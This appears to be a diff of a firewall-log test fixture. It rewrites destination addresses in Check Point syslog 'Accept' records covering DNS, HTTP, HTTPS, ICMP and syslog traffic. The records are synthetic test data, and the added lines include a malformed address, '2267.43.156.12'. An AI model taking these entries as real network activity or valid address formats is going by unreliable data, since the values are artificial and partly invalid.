-<134>1 2020-03-29T16:56:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d32e,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
-<134>1 2020-03-29T16:56:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d32e,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"]
+<134>1 2020-03-29T16:56:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d32e,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
+<134>1 2020-03-29T16:56:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d32e,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"]
 <134>1 2020-03-29T16:56:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d336,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59196"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:56:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d336,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60068"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26809"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T16:56:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d336,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45930"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:56:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d336,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53670"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43490"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T16:56:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d336,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42649"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:56:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d336,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33354"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43491"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T16:56:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d34f,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32851"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:56:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d34f,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32851"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:56:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d34f,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"195.88.54.16"; icmp:"Echo Request"; icmp_code:"0"; icmp_type:"8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"1"; service_id:"echo-request"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:56:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d34f,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53132"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:56:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d34f,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53132"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:56:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d351,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:56:50Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d352,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:56:55Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d357,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36215"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47671"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47671"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"88.221.161.187"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51746"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34871"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34871"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"52.17.223.107"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43558"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39427"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43009"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55380"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39427"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43009"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55380"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
